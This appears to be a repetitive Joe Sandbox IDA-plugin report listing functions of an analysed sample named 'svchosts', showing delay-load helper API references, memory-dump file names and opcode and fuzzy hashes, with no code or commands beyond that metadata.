Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9e9cd8c54479304464a6cb45b904d92aa1663b71b7a983f6db106d8dde1566e6
Instruction ID: 8d8ea9e7f9f374ea4f41bc7619a3cd23f6b5acf65102b62342eeb00c92abfc71
Opcode Fuzzy Hash: 9e9cd8c54479304464a6cb45b904d92aa1663b71b7a983f6db106d8dde1566e6
Instruction Fuzzy Hash: 5CB012A127D401AE310861046D0BF37031CC4C3B12330852FF50FD28C1DC805C390831

Function 002AD92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55567da8c5c16732850c3e887658b3913dd3c91d3f91b187fd0db1e494767d7f
Instruction ID: 49f63fa7ed70c944d363860372e5a0a812d5ff732d55f81bf2f540f0790ae9bb
Opcode Fuzzy Hash: 55567da8c5c16732850c3e887658b3913dd3c91d3f91b187fd0db1e494767d7f
Instruction Fuzzy Hash: 3FB0129127D401AE310961146C0BE37035CC4C3B12330852EF60FD28C1DD805C390C31

Function 002AD924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60c08b91cdf3714604e225bca58cfd07aef3bae073243bcc4782a2997b3577f5
Instruction ID: a794614bc5aa73eeceb9b97bff92b1a4022864d79bed4114dafe6e4c7b066d4c
Opcode Fuzzy Hash: 60c08b91cdf3714604e225bca58cfd07aef3bae073243bcc4782a2997b3577f5
Instruction Fuzzy Hash: 8CB0129127D401AE310861046D0BE37035DC8C3B12730452EF10FD28C1DC805C390831

Function 002AD906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ed3f9c261f0b32c51d5dea32316f269c19bc1993443f120fcc590a14c54c9469
Instruction ID: 259f60e96d1db44f0e99d2ed83f6f3ce20cd183684dbea4b15af2bad56586050
Opcode Fuzzy Hash: ed3f9c261f0b32c51d5dea32316f269c19bc1993443f120fcc590a14c54c9469
Instruction Fuzzy Hash: 3AB0129127E401AE310861046D0BE37031DC4C3B12730852EF50FD28C1DC805C390831

Function 002AD910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a9fbd667b5bfc02d0745fd10be34e3dcda34c23c08cc4637882efef22923974f
Instruction ID: 014540335a6a7391789ec065b2962b9bed1eb35f3354059259be89939c2fcfea
Opcode Fuzzy Hash: a9fbd667b5bfc02d0745fd10be34e3dcda34c23c08cc4637882efef22923974f
Instruction Fuzzy Hash: 81B012A127D501AE314862046D0BE37031DC4C3B12730462EF10FD28C1DC805C790831

Function 002AD942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dbc21d2f8989cfa3ba91b73622330a0e1b516b899b4db5db13742e8aa70cf864
Instruction ID: 4bada545c5a29893740db61cc50abc9c9fe581ad4ffed3eafac43fb27e591543
Opcode Fuzzy Hash: dbc21d2f8989cfa3ba91b73622330a0e1b516b899b4db5db13742e8aa70cf864
Instruction Fuzzy Hash: B6B012A127C401AF310D61046D0BE37039CC4C3B12730452EF10FD28C1DC805C3A0C31

Function 002ADACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 134c36d5d8a47f24fe113b5ef696b6d2ae81a220e7afb91984ec73ad1d4f49b7
Instruction ID: 246688fae8601a38405caf8b2463827a8b85a18805915f2f946fdb24b8b267d6
Opcode Fuzzy Hash: 134c36d5d8a47f24fe113b5ef696b6d2ae81a220e7afb91984ec73ad1d4f49b7
Instruction Fuzzy Hash: 2DB012A627D041FE310871056D03E3B025CC0C3B11330C22FF40BC1855DC844D384831

Function 002ADAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cc8dfc97d280480f1fd94acc46e4f170ca02aa16aa4b6f81e13c6e70e78ebc7b
Instruction ID: 88d9ebb50c7844fa7e457b315a2c72ef6b8ffea472a0cbd60ea04cea1b475108
Opcode Fuzzy Hash: cc8dfc97d280480f1fd94acc46e4f170ca02aa16aa4b6f81e13c6e70e78ebc7b
Instruction Fuzzy Hash: F8B0129627C041AE310871056C03F3F025CC0C7B11330862FF10BC1945DC804C3D4831

Function 002ADB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff073322e1449f9fd5247dffbd043d401283130099e6980a7e59201466bd8731
Instruction ID: 8ad5491476ddd5f59406a4f15b79d2ce878175ce62a251a7d815dd1a7e8a0b86
Opcode Fuzzy Hash: ff073322e1449f9fd5247dffbd043d401283130099e6980a7e59201466bd8731
Instruction Fuzzy Hash: 44B012962BC145AE310871056C03F3B025CD0C3B11330422FF00BC1845DC804C384D31

Function 002ADBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3ed9e45e8129da07e7a159d5bc9241813908a21b6a7d80225ad04321789faef
Instruction ID: f3bb2784e169f0be1930a8653e0a840c9a0c8f63ffd1890de71a9bfc5972933e
Opcode Fuzzy Hash: c3ed9e45e8129da07e7a159d5bc9241813908a21b6a7d80225ad04321789faef
Instruction Fuzzy Hash: 86B09296279006AE210851442807E770228C08AF10320892EB50AC2840DD804C394831

Function 002ADBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 62000714edc6530a4a732a4714a3b6c2a57a992b14ee664826547126f13c3625
Instruction ID: f889084d74313704120f8d1e585330da5d31af009ca09e8547c38d612d4b5afa
Opcode Fuzzy Hash: 62000714edc6530a4a732a4714a3b6c2a57a992b14ee664826547126f13c3625
Instruction Fuzzy Hash: ACB0129637C006AF310C51442D07E77022CC0CBF10330892EF20BC1840DD804C3A4831

Function 002ADBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e4be8f2f21155c2dfadcc6aa2993d5226eebdcfa976d63da35ac57b14692edb8
Instruction ID: 9c0f38819bd8cb09b1f45d9a1b23015bedce923adacbd1bbb5f1a263ea09847c
Opcode Fuzzy Hash: e4be8f2f21155c2dfadcc6aa2993d5226eebdcfa976d63da35ac57b14692edb8
Instruction Fuzzy Hash: 3CB0129637C10ABE320811402C07D77022CC0C7F103304A3EF107D0840DD804C7D4831

Function 002ADBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c5bf2759c8f9eee9c4e9fb8c4c5c30380945125b8bee496e3b614f3519b87a65
Instruction ID: 50360c1edbbb961f6682e10c51599b5955265fd64240847e5172316051666b9e
Opcode Fuzzy Hash: c5bf2759c8f9eee9c4e9fb8c4c5c30380945125b8bee496e3b614f3519b87a65
Instruction Fuzzy Hash: 49B0129637C005AE310851542C17F37022CD0DBF10330493EF10BD1D40DD808C3D4831

Function 002ADC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADC36

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d8790dc1fc027a640845ecd66250e0278c637a6f602e37fc8f5c31ea13d32756
Instruction ID: f5293922ee2e24b955dce16912125154e67610f87fdba53ce7d6c6f75371542d
Opcode Fuzzy Hash: d8790dc1fc027a640845ecd66250e0278c637a6f602e37fc8f5c31ea13d32756
Instruction Fuzzy Hash: 9CB09299278209AE210821106A02E37822DC1C2F20360462AB20AE084299805C685435

Function 002ADC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADC36

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1a0e0ae465696b8631e43bc031ada4bef543ac382377fc94114d5c5e5db56202
Instruction ID: b96df59f0c39ce07aceec9d7ad745e32cedc1bc4757785627b05250054595f45
Opcode Fuzzy Hash: 1a0e0ae465696b8631e43bc031ada4bef543ac382377fc94114d5c5e5db56202
Instruction Fuzzy Hash: 53B09299278209AE310861146802E37422CC0C2F20360462BB20AD1842D9805C284435

Function 002ADC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADC36

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fa491ddc9948ed0d4466c253787ebb8d33c5ff2b8783a26fcbd5fe2a7d0a5ac
Instruction ID: fd85bf77e3e4a2b12fa0ec5df5568838672a3395dfed0f3482d73bc8dedf3f25
Opcode Fuzzy Hash: 0fa491ddc9948ed0d4466c253787ebb8d33c5ff2b8783a26fcbd5fe2a7d0a5ac
Instruction Fuzzy Hash: 54B09299279109AE220861146802E37422CC0C7F20360862AB60AD1842D9805C284435

Function 002AD8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7eaddecdecc463028cf4b501b0b41fe1a47944d17d5483a6e06287408d23cb31
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 7eaddecdecc463028cf4b501b0b41fe1a47944d17d5483a6e06287408d23cb31
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

